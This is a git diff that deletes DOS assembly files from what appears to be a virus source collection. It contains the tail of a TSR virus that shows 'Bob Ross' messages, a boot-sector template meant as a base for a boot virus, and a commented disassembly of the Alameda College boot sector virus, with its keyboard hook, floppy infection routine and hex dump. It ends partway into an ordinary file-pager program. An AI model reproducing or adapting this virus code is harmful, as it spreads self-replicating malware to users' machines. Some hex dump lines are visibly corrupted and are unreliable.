2508h ; Install new handler - mov dx, Int_08_Start ; from DS:DX - int 21h ; Do it - - push es - mov ax, ds:[2Ch] ; Deallocate program - mov es, ax ; environment block - mov ah, 49h - int 21h - pop es - - mov ax, 3100h ; TSR - mov dx, (offset int_end - offset int_start + offset part1_end - offset Code + 4 + 15 + 128) SHR 4 - int 21h - int 20h ; In case of error -Quit_Init: - pop es -Error: ; On error, quit -Quit: - mov ah, 3Bh ; Change directory - mov dx, offset root_dir ; to the root dir - add dx, offset_off - int 21h - - mov ah,3Bh ; Change directory - ; Return to orig dir - add dx, offset orig_path - offset root_dir - int 21h - -; Copy buffer back to beginning of file - mov si, dx - add si, offset buffer2 - offset orig_path - mov di, 0100h - mov cx, part1_end - part1_start - rep movsb - - mov di, 0100h - jmp di -int_start: -_int_08_handler proc far - push ax - push bx - push cx - push dx - push si - push ds - push es - pushf - dec word ptr CS:[Counter] ; Counter - jnz QuitNow -;ACTIVATION!!! - mov word ptr CS:[Counter], delay ; Reset counter - - ; Set up DS & ES to equal CS - push cs - pop ds - push cs - pop es - - mov si, offset Messages - offset int_start + int_08_start - mov cx, cs:D_Mess - xor ah, ah -LoopY_ThingY: - lodsb ; DS:SI -> AL - add si, ax ; ES:BP -> Next message to display - loop LoopY_ThingY - - lodsb - xchg si, bp - - xor cx, cx - mov cl, al ; Length of string - mov ax, 1300h ; - mov bx, 0070h ; Page 0, inverse video - xor dx, dx ; (0,0) - int 10h ; Display ES:BP - inc word ptr cs:[D_Mess] - cmp word ptr cs:[D_Mess], num_messages - jnz Sigh - mov word ptr cs:[D_Mess], 1 - -Sigh: mov cx, 30h -Sigh2: push cx - mov cx, 0FFFFh -DelayX: loop DelayX - pop cx - loop Sigh2 - xchg si, bp -QuitNow: - popf - pop es - pop ds - pop si - pop dx - pop cx - pop bx - pop ax - jmp dword ptr CS:duh - -Messages db 0 - db 15, 'Bob Ross lives!' - db 21, 'Bob Ross is watching!' - db 22, 'Maybe he lives here...' - db 26, 'What a happy little cloud!' - db 38, 'Maybe he has a neighbour right here...' - db 40, 'You can make up stories as you go along.' -_int_08_handler endp -int_end: -part2_end: - -CODE ends - end part1_start - diff --git a/b/BOOT (27).ASM b/b/BOOT (27).ASM deleted file mode 100755 index 839a0b8..0000000 --- a/b/BOOT (27).ASM +++ /dev/null @@ -1,248 +0,0 @@ -;This is a simple boot sector that will load either MS-DOS or PC-DOS. It is not -;self-reproducing, but it will be used as the foundation on which to build a -;virus into a boot sector. - -;This segment is where the first operating system file (IBMBIO.COM or IO.SYS) -;will be loaded and executed from. We don't know (or care) what is there, but -;we do need the address to jump to defined in a separate segment so we can -;execute a far jump to it. -DOS_LOAD SEGMENT AT 0070H - ASSUME CS:DOS_LOAD - - ORG 0 - -LOAD: DB 0 ;Start of the first operating system program - -DOS_LOAD ENDS - - -MAIN SEGMENT BYTE - ASSUME CS:MAIN,DS:MAIN,SS:NOTHING - -;This jump instruction is just here so we can compile this program as a COM -;file. It is never actually executed, and never becomes a part of the boot -;sector. Only the 512 bytes after the address 7C00 in this file become part of -;the boot sector. - ORG 100H - -START: jmp BOOTSEC - -;The following two definitions are BIOS RAM bytes which contain information -;about the number and type of disk drives in the computer. These are needed by -;the virus to decide on where to look to find drives to infect. They are not -;normally needed by an ordinary boot sector. -; -; ORG 0410H -; -;SYSTEM_INFO: DB ? ;System info byte: Take bits 6 & 7 and add 1 to get number of -; ;disk drives on this system (eg 01 = 2 drives) -; -; ORG 0475H -; -;HD_COUNT: DB ? ;Number of hard drives in the system -; -;This area is reserved for loading the first sector of the root directory, when -;checking for the existence of system files and loading the first system file. - - ORG 0500H - -DISK_BUF: DW ? ;Start of the buffer - -;Here is the start of the boot sector code. This is the chunk we will take out -;of the compiled COM file and put it in the first sector on a 360K floppy disk. -;Note that this MUST be loaded onto a 360K floppy to work, because the -;parameters in the data area that follow are set up to work only with a 360K -;disk! - - ORG 7C00H - -BOOTSEC: JMP BOOT ;Jump to start of boot sector code - - ORG 7C03H ;This is needed because the jump will get coded as 2 bytes - -DOS_ID: DB 'EZBOOT ' ;Name of this boot sector (8 bytes) -SEC_SIZE: DW 200H ;Size of a sector, in bytes -SECS_PER_CLUST: DB 02 ;Number of sectors in a cluster -FAT_START: DW 1 ;Starting sector for the first File Allocation Table (FAT) -FAT_COUNT: DB 2 ;Number of FATs on this disk -ROOT_ENTRIES: DW 70H ;Number of root directory entries -SEC_COUNT: DW 2D0H ;Total number of sectors on this disk -DISK_ID: DB 0FDH ;Disk type code (This is 360KB) -SECS_PER_FAT: DW 2 ;Number of sectors per FAT -SECS_PER_TRK: DW 9 ;Sectors per track for this drive -HEADS: DW 2 ;Number of heads (sides) on this drive -HIDDEN_SECS: DW 0 ;Number of hidden sectors on the disk - -DSKBASETBL: - DB 0 ;Specify byte 1: step rate time, head unload time - DB 0 ;Specify byte 2: Head load time, DMA mode - DB 0 ;Wait time until motor turned off, in clock ticks - DB 0 ;Bytes per sector (0=128, 1=256, 2=512, 3=1024) - DB 12H ;Last sector number (we make it large enough to handle 1.2/1.44 MB floppies) - DB 0 ;Gap length between sectors for r/w operations, in bytes - DB 0 ;Data transfer length when sector length not specified - DB 0 ;Gap length between sectors for format operations, in bytes - DB 0 ;Value stored in newly formatted sectors - DB 1 ;Head settle time, in milliseconds (we set it small to speed operations) - DB 0 ;Motor startup time, in 1/8 seconds - -HEAD: DB 0 ;Current head to read from (scratch area used by boot sector) - -;Here is the start of the boot sector code - -BOOT: CLI ;interrupts off - XOR AX,AX ;prepare to set up segments - MOV ES,AX ;set ES=0 - MOV SS,AX ;start stack at 0000:7C00 - MOV SP,OFFSET BOOTSEC - MOV BX,1EH*4 ;get address of disk - LDS SI,SS:[BX] ;param table in ds:si - PUSH DS - PUSH SI ;save that address - PUSH SS - PUSH BX ;and its address - - MOV DI,OFFSET DSKBASETBL ;and update default - MOV CX,11 ;values to the table stored here - CLD ;direction flag cleared -DFLT1: LODSB - CMP BYTE PTR ES:[DI],0 ;anything non-zero - JNZ SHORT DFLT2 ;is not a default, so don't save it - STOSB ;else put default value in place - JMP SHORT DFLT3 ;and go on to next -DFLT2: INC DI -DFLT3: LOOP DFLT1 ;and loop until cx=0 - - MOV AL,AH ;set ax=0 - MOV DS,AX ;set ds=0 so we can set disk tbl - MOV WORD PTR [BX+2],AX ;to @DSKBASETBL (ax=0 here) - MOV WORD PTR [BX],OFFSET DSKBASETBL ;ok, done - STI ;now turn interrupts on - INT 13H ;and reset disk drive system -ERROR1: JC ERROR1 ;if an error, hang the machine - -;Here we look at the first file on the disk to see if it is the first MS-DOS or -;PC-DOS system file, IO.SYS or IBMBIO.COM, respectively. -LOOK_SYS: - MOV AL,BYTE PTR [FAT_COUNT] ;get fats per disk - XOR AH,AH - MUL WORD PTR [SECS_PER_FAT] ;multiply by sectors per fat - ADD AX,WORD PTR [HIDDEN_SECS] ;add hidden sectors - ADD AX,WORD PTR [FAT_START] ;add starting fat sector - - PUSH AX - MOV WORD PTR [DOS_ID],AX ;root dir, save it - - MOV AX,20H ;dir entry size - MUL WORD PTR [ROOT_ENTRIES] ;dir size in ax - MOV BX,WORD PTR [SEC_SIZE] ;sector size - ADD AX,BX ;add one sector - DEC AX ;decrement by 1 - DIV BX ;ax=# sectors in root dir - ADD WORD PTR [DOS_ID],AX ;DOS_ID=start of data - MOV BX,OFFSET DISK_BUF ;set up disk read buffer at 0000:0500 - POP AX - CALL CONVERT ;and go convert sequential sector number to bios data - MOV AL,1 ;prepare for a disk read for 1 sector - CALL READ_DISK ;go read it - - MOV DI,BX ;compare first file on disk with - MOV CX,11 ;required file name - MOV SI,OFFSET SYSFILE_1 ;of first system file for PC DOS - REPZ CMPSB - JZ SYSTEM_THERE ;ok, found it, go load it - - MOV DI,BX ;compare first file with - MOV CX,11 ;required file name - MOV SI,OFFSET SYSFILE_2 ;of first system file for MS DOS - REPZ CMPSB -ERROR2: JNZ ERROR2 ;not the same - an error, so hang the machine - -;Ok, system file is there, so load it -SYSTEM_THERE: - MOV AX,WORD PTR [DISK_BUF+1CH] ;get file size of IBMBIO.COM/IO.SYS - XOR DX,DX - DIV WORD PTR [SEC_SIZE] ;and divide by sector size - INC AL ;ax=number of sectors to read - MOV BP,AX ;store that number in BP - MOV AX,WORD PTR [DOS_ID] ;get sector number of start of data - PUSH AX - MOV BX,700H ;set disk read buffer to 0000:0700 -RD_BOOT1: MOV AX,WORD PTR [DOS_ID] ;and get sector to read - CALL CONVERT ;convert to bios Trk/Cyl/Sec info - MOV AL,1 ;read one sector - CALL READ_DISK ;go read the disk - SUB BP,1 ;subtract 1 from number of sectors to read - JZ DO_BOOT ;and quit if we're done - ADD WORD PTR [DOS_ID],1 ;add sectors read to sector to read - ADD BX,WORD PTR [SEC_SIZE] ;and update buffer address - JMP RD_BOOT1 ;then go for another - - -;Ok, the first system file has been read in, now transfer control to it -DO_BOOT: - MOV CH,BYTE PTR [DISK_ID] ;Put drive type in ch - MOV DL,BYTE PTR [DRIVE] ;Drive number in dl - POP BX - JMP FAR PTR LOAD ;and transfer control to the first system file - - -;Convert sequential sector number in ax to BIOS Track, Head, Sector information. -;Save track number in DX, sector number in CH, -CONVERT: - XOR DX,DX - DIV WORD PTR [SECS_PER_TRK] ;divide ax by sectors per track - INC DL ;dl=sector number to start read on, al=track/head count - MOV CH,DL ;save it here - XOR DX,DX - DIV WORD PTR [HEADS] ;divide ax by head count - MOV BYTE PTR [HEAD],DL ;dl=head number, save it - MOV DX,AX ;ax=track number, save it in dx - RET - - -;Read the disk for the number of sectors in al, into the buffer es:bx, using -;the track number in DX, the head number at HEAD, and the sector -;number at CH. -READ_DISK: - MOV AH,2 ;read disk command - MOV CL,6 ;shift possible upper 2 bits of track number to - SHL DH,CL ;the high bits in dh - OR DH,CH ;and put sector number in the low 6 bits - MOV CX,DX - XCHG CH,CL ;ch (0-5) = sector, cl, ch (6-7) = track - MOV DL,BYTE PTR [DRIVE] ;get drive number from here - MOV DH,BYTE PTR [HEAD] ;and head number from here - INT 13H ;go read the disk -ERROR3: JC ERROR3 ;hang in case of an error - RET - -;Move data that doesn't change from this boot sector to the one read in at -;DISK_BUF. That includes everything but the DRIVE ID (at offset 7DFDH) and -;the data area at the beginning of the boot sector. -MOVE_DATA: - MOV SI,OFFSET DSKBASETBL ;Move all of the boot sector code after the data area - MOV DI,OFFSET DISK_BUF + (OFFSET DSKBASETBL - OFFSET BOOTSEC) - MOV CX,OFFSET DRIVE - OFFSET DSKBASETBL - REP MOVSB - MOV SI,OFFSET BOOTSEC ;Move the initial jump and the sector ID - MOV DI,OFFSET DISK_BUF - MOV CX,11 - REP MOVSB - RET - - -SYSFILE_1: DB 'IBMBIO COM' ;PC DOS System file -SYSFILE_2: DB 'IO SYS' ;MS DOS System file - - ORG 7DFDH - -DRIVE: DB 0 ;Drive number, used in disk reads, etc. -BOOT_ID: DW 0AA55H ;Boot sector ID word - - -MAIN ENDS - - - END START - \ No newline at end of file diff --git a/b/BOOTVIR (28).ASM b/b/BOOTVIR (28).ASM deleted file mode 100755 index 67c92bb..0000000 --- a/b/BOOTVIR (28).ASM +++ /dev/null @@ -1,431 +0,0 @@ - - P/HUN Issue #4, Volume 2: Phile 3 of 11 - ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - A BOOT SECTOR VIRUS - 5/15/89 - - -The following is a disassembled and commented version of the Alemeda -College Boot infector virus. Courtesy of Southern Cross. - - -;-----------------------------------------------------------------------; -; This virus is of the "FLOPPY ONLY" variety. ; -; It replicates to the boot sector of a floppy disk and when it gains control -; it will move itself to upper memory. It redirects the keyboard ; -; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ; -; it will attempt to infect any floppy it finds in drive A:. ; -; It keeps the real boot sector at track 39, sector 8, head 0 ; -; It does not map this sector bad in the fat (unlike the Pakistani Brain) -; and should that area be used by a file, the virus ; -; will die. It also contains no anti detection mechanisms as does the ; -; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ; -; sector 9 because this is common to all floppy formats both single ; -; sided and double sided. It does not contain any malevolent TROJAN ; -; HORSE code. It does appear to contain a count of how many times it ; -; has infected other diskettes although this is harmless and the count ; -; is never accessed. ; -; ; -; Things to note about this virus: ; -; It can not only live through an ALT-CTRL-DEL reboot command, but this ; -; is its primary (only for that matter) means of reproduction to other ; -; floppy diskettes. The only way to remove it from an infected system ; -; is to turn the machine off and reboot an uninfected copy of DOS. ; -; It is even resident when no floppy is booted but BASIC is loaded ; -; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ; -; it activates and infectes the floppy from which the user is ; -; attempting to boot. ; -; ; -; Also note that because of the POP CS command to pass control to ; -; its self in upper memory, this virus does not to work on 80286 ; -; machines (because this is not a valid 80286 instruction). ; -; ; -; The Norton Utilities can be used to identify infected diskettes by ; -; looking at the boot sector and the DOS SYS utility can be used to ; -; remove it (unlike the Pakistani Brain). ; -;-----------------------------------------------------------------------; - ; - ORG 7C00H ; - ; -TOS LABEL WORD ;TOP OF STACK -;-----------------------------------------------------------------------; -; 1. Find top of memory and copy ourself up there. (keeping same offset); -; 2. Save a copy of the first 32 interrupt vectors to top of memory too ; -; 3. Redirect int 9 (keyboard) to ourself in top of memory ; -; 4. Jump to ourself at top of memory ; -; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ; -;-----------------------------------------------------------------------; -BEGIN: CLI ;INITIALIZE STACK - XOR AX,AX ; - MOV SS,AX ; - MOV SP,offset TOS ; - STI ; - ; - MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512) - MOV DS,BX ; - MOV AX,[0013H] ; - MUL BX ; - SUB AX,07E0H ; (7C00H+512)/16 - MOV ES,AX ; - ; - PUSH CS ;DS = CS - POP DS ; - ; - CMP DI,3456H ;IF THE VIRUS IS REBOOTING... - JNE B_10 ; - DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1-- - ; -B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY - MOV DI,SI ; - MOV CX,512 ; - CLD ; - REP MOVSB ; - ; - MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO - MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE - MOV CX,128 ; - REP MOVSB ; - ; - CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) - ; - PUSH ES ;ES=HI ;JUMP TO OUR HI CODE WITH - POP CS ; CS = ES - ; - PUSH DS ;DS=0 ;ES = DS - POP ES ; - ; - MOV BX,SP ;SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00 - MOV DX,CX ;CX=0 ; DRIVE A: HEAD 0 - MOV CX,2708H ; TRACK 40, SECTOR 8 - MOV AX,0201H ; READ SECTOR - INT 13H ; (common to 8/9 sect. 1/2 sided!) - JB $ ; HANG IF ERROR - ; - JMP JMP_BOOT ;JMP 0000:7C00 - ; -;-----------------------------------------------------------------------; -; SAVE THEN REDIRECT INT 9 VECTOR ; -; ; -; ON ENTRY: DS = 0 ; -; ES = WHERE TO SAVE OLD_09 & (HI) ; -; WHERE NEW_09 IS (HI) ; -;-----------------------------------------------------------------------; -PUT_NEW_09: ; - DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024 - ; - MOV SI,9*4 ;COPY INT 9 VECTOR TO - MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!) - MOV CX,0004 ; - ; - CLI ; - REP MOVSB ; - MOV Word Ptr [9*4],offset NEW_09 - MOV [(9*4)+2],ES ; - STI ; - ; - RET ; - ; -;-----------------------------------------------------------------------; -; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ; -;-----------------------------------------------------------------------; -ACK_KEYBD: ; - IN AL,61H ;RESET KEYBOARD THEN CONTINUE - MOV AH,AL ; - OR AL,80H ; - OUT 61H,AL ; - XCHG AL,AH ; - OUT 61H,AL ; - JMP RBOOT ; - ; -;-----------------------------------------------------------------------; -; DATA AREA WHICH IS NOT USED IN THIS VERSION ; -; REASON UNKNOWN ; -;-----------------------------------------------------------------------; -TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39 - DB 27H,0,2,2 ; (CURRENTLY NOT USED) - DB 27H,0,3,2 ; - DB 27H,0,4,2 ; - DB 27H,0,5,2 ; - DB 27H,0,6,2 ; - DB 27H,0,7,2 ; - DB 27H,0,8,2 ; - ; -;A7C9A LABEL BYTE ; - DW 00024H ;NOT USED - DB 0ADH ; - DB 07CH ; - DB 0A3H ; - DW 00026H ; - ; -;L7CA1: ; - POP CX ;NOT USED - POP DI ; - POP SI ; - POP ES ; - POP DS ; - POP AX ; - POPF ; - JMP 1111:1111 ; - ; -;-----------------------------------------------------------------------; -; IF ALT & CTRL & DEL THEN ... ; -; IF ALT & CTRL & ? THEN ... ; -;-----------------------------------------------------------------------; -NEW_09: PUSHF ; - STI ; - ; - PUSH AX ; - PUSH BX ; - PUSH DS ; - ; - PUSH CS ;DS=CS - POP DS ; - ; - MOV BX,[ALT_CTRL] ;BX=SCAN CODE LAST TIME - IN AL,60H ;GET SCAN CODE - MOV AH,AL ;SAVE IN AH - AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH - ; - CMP AL,1DH ;IS IT A [CTRL]... - JNE N09_10 ;...JUMP IF NO - MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP) - JMP N09_30 ; - ; -N09_10: CMP AL,38H ;IS IT AN [ALT]... - JNE N09_20 ;...JUMP IF NO - MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP) - JMP N09_30 ; - ; -N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)... - JNE N09_30 ;...JUMP IF NO - ; - CMP AL,17H ;IF [I]... - JE N09_X0 ;...JUMP IF YES - CMP AL,53H ;IF [DEL]... - JE ACK_KEYBD ;...JUMP IF YES - ; -N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME - ; -N09_90: POP DS ; - POP BX ; - POP AX ; - POPF ; - ; - DB 0EAH ;JMP F000:E987 -OLD_09 DW ? ; - DW 0F000H ; - ; -N09_X0: JMP N09_X1 ; - ; -;-----------------------------------------------------------------------; -; ; -;-----------------------------------------------------------------------; -RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!? - MOV AX,0800H ;AL=0, AH=DELAY ARG - OUT DX,AL ; - CALL DELAY ; - MOV [ALT_CTRL],AX ;AX=0 ; - ; - MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR - INT 10H ; - MOV AH,2 ;SET CURSOR POS 0,0 - XOR DX,DX ; - MOV BH,DH ; PAGE 0 - INT 10H ; - ; - MOV AH,1 ;SET CURSOR TYPE - MOV CX,0607H ; - INT 10H ; - ; - MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW) - CALL DELAY ; - ; - CLI ; - OUT 20H,AL ;SEND EOI TO INT CONTROLLER - ; - MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS - MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!) - MOV SI,offset BEGIN - 128 ; - MOV CX,128 ; - CLD ; - REP MOVSB ; - ; - MOV DS,CX ;CX=0 ;DS=0 - ; - MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR - MOV [(19H*4)+2],CS ; - ; - MOV AX,0040H ;DS = ROM DATA AREA - MOV DS,AX ; - ; - MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0 - INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE) - ; - PUSH DS ;IF BIOS F000:E502 == 21E4... - MOV AX,0F000H ; - MOV DS,AX ; - CMP Word Ptr [0E502H],21E4H ; - POP DS ; - JE R_90 ; - INT 19H ; IF NOT...REBOOT - ; -R_90: JMP 0F000:0E502H ;...DO IT ?!?!?! - ; -;-----------------------------------------------------------------------; -; REBOOT INT VECTOR ; -;-----------------------------------------------------------------------; -NEW_19: XOR AX,AX ; - ; - MOV DS,AX ;DS=0 - MOV AX,[0410] ;AX=EQUIP FLAG - TEST AL,1 ;IF FLOPPY DRIVES ... - JNZ N19_20 ;...JUMP -N19_10: PUSH CS ;ELSE ES=CS - POP ES ; - CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) - INT 18H ;LOAD BASIC - ; -N19_20: MOV CX,0004 ;RETRY COUNT = 4 - ; -N19_22: PUSH CX ; - MOV AH,00 ;RESET DISK - INT 13 ; - JB N19_81 ; - MOV AX,0201 ;READ BOOT SECTOR - PUSH DS ; - POP ES ; - MOV BX,offset BEGIN ; - MOV CX,1 ;TRACK 0, SECTOR 1 - INT 13H ; -N19_81: POP CX ; - JNB N19_90 ; - LOOP N19_22 ; - JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC - ; -;-----------------------------------------------------------------------; -; Reinfection segment. ; -;-----------------------------------------------------------------------; -N19_90: CMP DI,3456 ;IF NOT FLAG SET... - JNZ RE_INFECT ;...RE INFECT - ; -JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR - JMP 0000:7C00H ; - ; -;-----------------------------------------------------------------------; -; Reinfection Segment. ; -;-----------------------------------------------------------------------; -RE_INFECT: ; - MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH - MOV CX,00E6H ; OURSELF - MOV DI,SI ; - PUSH CS ; - POP ES ; - CLD ; - REPE CMPSB ; - JE RI_12 ;IF NOT EQUAL... - ; - INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!) - ; -;MAKE SURE TRACK 39, HEAD 0 FORMATTED ; - MOV BX,offset TABLE ;FORMAT INFO - MOV DX,0000 ;DRIVE A: HEAD 0 - MOV CH,40-1 ;TRACK 39 - MOV AH,5 ;FORMAT - JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW ! - ; -; <<< NO EXECUTION PATH TO HERE >>> ; - JB RI_80 ; - ; -;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0 -RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0 - MOV BX,offset BEGIN ;TRACK 40H - MOV CL,8 ;SECTOR 8 - MOV AX,0301H ;WRITE 1 SECTOR - INT 13H ; - ; - PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW) - POP ES ; - JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE - ; - MOV CX,0001 ;WRITE INFECTED BOOT SECTOR ! - MOV AX,0301 ; - INT 13H ; - JB RI_80 ; IF ERROR...JUMP TO BOOT CODE - ; -RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"... - INT 19H ;...FLAG AND REBOOT - ; -RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) - DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT) - JMP JMP_BOOT ; - ; -;-----------------------------------------------------------------------; -; ; -;-----------------------------------------------------------------------; -N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS - ; - MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG - MOV BX,0040H ; - MOV DS,BX ; - MOV [0072H],AX ; 0040:0072 = RESET FLAG - JMP N09_90 ; - ; -;-----------------------------------------------------------------------; -; DELAY ; -; ; -; ON ENTRY AH:CX = LOOP COUNT ; -;-----------------------------------------------------------------------; -DELAY: SUB CX,CX ; -D_01: LOOP $ ; - SUB AH,1 ; - JNZ D_01 ; - RET ; - ; -;-----------------------------------------------------------------------; -; ; -;-----------------------------------------------------------------------; -A7DF4 DB 27H,00H,8,2 - -COUNTER_1 DW 001CH -ALT_CTRL DW 0 - -A7DFC DB 27H,0,8,2 - -END -;-----------------------------------------------------------------------; -; Hexadecimal representation. ; -;-----------------------------------------------------------------------; -;7C00 FA 31 C0 8E D0 BC 00 7C-FB BB 40 00 8E DB A1 13 z1@.P<.|{;@..[!. -;7C10 00 F7 E3 2D E0 07 8E C0-0E 1F 81 FF 56 34 75 04 .wc-`..@....V4u. -;7C20 FF 0E F8 7D 89 E6 89 F7-B9 00 02 FC F3 A4 89 CE ..x}.f.w9..|s$.N -;7C30 BF 80 7B B9 80 00 F3 A4-E8 15 00 06 0F 1E 07 89 ?.{9..s$h....... -;7C40 E3 89 CA B9 08 27 B8 01-02 CD 13 72 FE E9 38 01 c.J9.'8..M.r~i8. -;7C50 FF 0E 13 04 BE 24 00 BF-E6 7C B9 04 00 FA F3 A4 ....>$.?f|9..zs$ -;7C60 C7 06 24 00 AD 7C 8C 06-26 00 FB C3 E4 61 88 C4 G.$.-|..&.{Cda.D -;7C70 0C 80 E6 61 86 C4 E6 61-EB 73 27 00 01 02 27 00 ..fa.Dfaks'...'. -;7C80 02 02 27 00 03 02 27 00-04 02 27 00 05 02 27 00 ..'...'...'...'. -;7C90 06 02 27 00 07 02 27 00-08 02 24 00 AD 7C A3 26 ..'...'.$.-|#& -;7CA0 09 5F 5E 07 1F 58 9D-EA 11 11 1 FB .Y_^..X.j.....{P -;7CB0 53 1E 0E 1F 8B 1E FA 7D-E4 60 88 C4 25 7F 88 S.....z}d`.D%..< -;7CC0 1D 75 04 88 E3 EB 16 3C-38 75 04 88 E7 EB 0E .u..ck.<8u..gk.. -;7CD0 FB 08 08 75 08 3C 17 74-11 3C 53 74 8F 89 1E {..u.<.t..{9.. -;7D20 FC F3 A4 8E D9 C7 06 64-00 52 7D 8C 0E 66 00 B8 |s$.YG.R}..f.8 -;7D30 40 00 8E D8 88 26 17 00-FF 06 13 00 1E B8 00 F0 @..X.&.....8.p -;7D4 8E D8 81 3E 02 E5 E4 21-1F 74 02 CD 19 EA 02 E5 .X.>.ed!.t.M.e -;7D50 00 F0 31 C0 8E D8 A1 10-04 A8 01 75 07 0E 07 E8 .p1@.X!..(.u.. -;7D60 EE FE CD 18 B9 04 00 51-B4 00 CD 13 72 0D B8 01 n~M.9..Q4.M.r.8 -;7D70 02 1E 07 BB 00 7C B9 01-00 C3 59 73 04 E2 E7 ...;.|9..M.Ys.bg -;780 EB DB 81 FF 56 34 75 05-EA 00 7C 00 00 BE 00 7C k[..V4u|..>.| -;7D90 B9 E6 00 89 F7 0E 07 FC-F3 A6 74 2D 26 FF 06 F8 9f..w..|t-&..x -;7DA0 7D BB 7A 7C BA 00 00 B5-27 B4 05 EB 02 72 1F 8E };z|:..5.k.r.. -;7DB0 C2 BB 00 7C B1 08 B8 01-03 CD 13 0E 07 72 0F B9 B;.|1.8....r.9 -;7DC0 01 00 B8 01 03 CD 13 72-05 BF 56 34 CD 19 E8 7F ..8..M.rV4M.h. -;7DD0 FE 26 FF 0E F8 7D EB B0-89 1E FA 7D A1 F8 7D BB ~&..x}k0}!x}; -;7DE0 40 00 8E DB A3 72 0E9-F7 FE 29 C9 E2 FE 80 EC @..[#r.iwIb~.l -;7DF0 01 75 F9 C3 27 00 08 02-1C 00 00 00 27 00 08 02 .uyC'.....'... -;---------------------------------------------------------------------; -End of commented code for the Alameda College Boot Infector Virus. \ No newline at end of file diff --git a/b/BROWSE (29).ASM b/b/BROWSE (29).ASM deleted file mode 100755 index 291e4f1..0000000 --- a/b/BROWSE (29).ASM +++ /dev/null @@ -1,454 +0,0 @@ -; BROWSE.ASM -- Full Screen File Pager -; ==================================== - -CSEG Segment - Assume CS:CSEG, DS:CSEG, ES:CSEG, SS:CSEG - Org 0080h -Parameter Label Byte - Org 0100h -Entry: Jmp Begin - -; All Data -; -------- - - db 'ATTR=' -Attribute db 0 ; Current screen attribute - db 'SHIFT=' -ShiftHoriz db 8 ; Horizontal shift screen default -DosVersionFail db 'Requires DOS 2.0 or above$' -NoSpaceFail db 'Not enough memory$' -FileFail db 'File Not Found$' -ScreenFail db 'Unsupported video mode$' -Delimiters db 9,' ,;=/' ; Delimiters in parameter -FileHandle dw ? ; Use for saving file handle -WSMode db 0FFh ; AND value for non-WordStar mode -LineLength db ? ; Length of line (from BIOS) -NumberLines db 25,0 ; Number of lines (check EGA BIOS) -ScreenSize dw ? ; Size of screen in bytes -CheckRetrace db 1 ; Flag zero if EGA or MONO used -Addr6845 dw ? ; Could use for retrace check -ScreenAddr Label DWord ; Address of screen -ScreenOff dw 0 ; Higher for non-page 0 -ScreenSeg dw 0B800h ; Set to B000h for Mono Mode 7 -ScreenStart dw ? ; Points within buffer -EndOfFile dw ? ; Points within buffer -FileOffset dw -1, -1 ; Address within file of buffer data -HorizOffset dw 0 ; Horizontal offset for display -RightMargin dw 0 ; Right margin for offset display -Dispatch dw Home, Up, PgUp, Dummy, Left - dw Dummy, Right, Dummy, End, Down, PgDn - -; Check DOS Version for 2.0 or above -; ---------------------------------- - -Begin: Cld ; All string directions forward - Mov AH,30h - Int 21h ; Get DOS Version Number - Cmp AL,2 ; Check for 2.0 or later - Jae DOSVerOK - Mov DX,Offset DOSVersionFail -ErrorExit: Mov AH,9 ; Write error message - Int 21h - Int 20h - -; Parse Command Line to get File Name and WordStar flag -; ----------------------------------------------------- - -DOSVerOK: Mov SI,1 + Offset Parameter ; Points to parameter -NameSearch: Lodsb ; Get byte - Cmp AL,13 ; Check if carriage return - Jz NoFileFound ; If so, no file name - Mov DI,Offset Delimiters ; String of delimiters - Mov CX,5 ; Number of delimiters (no /) - Repne Scasb ; See if a match - Je NameSearch ; If a delimiter, keep looking - Mov DX,SI ; Otherwise found file name - Dec DX ; Points to beginning of it -EndSearch: Lodsb ; Get next byte - Cmp AL,13 ; See if carriage return - Je GotFileEnd ; If so, we're all done - Mov DI,Offset Delimiters ; String of delimiters - Mov CX,6 ; Number (including /) - Repne Scasb ; See if a match - Jne 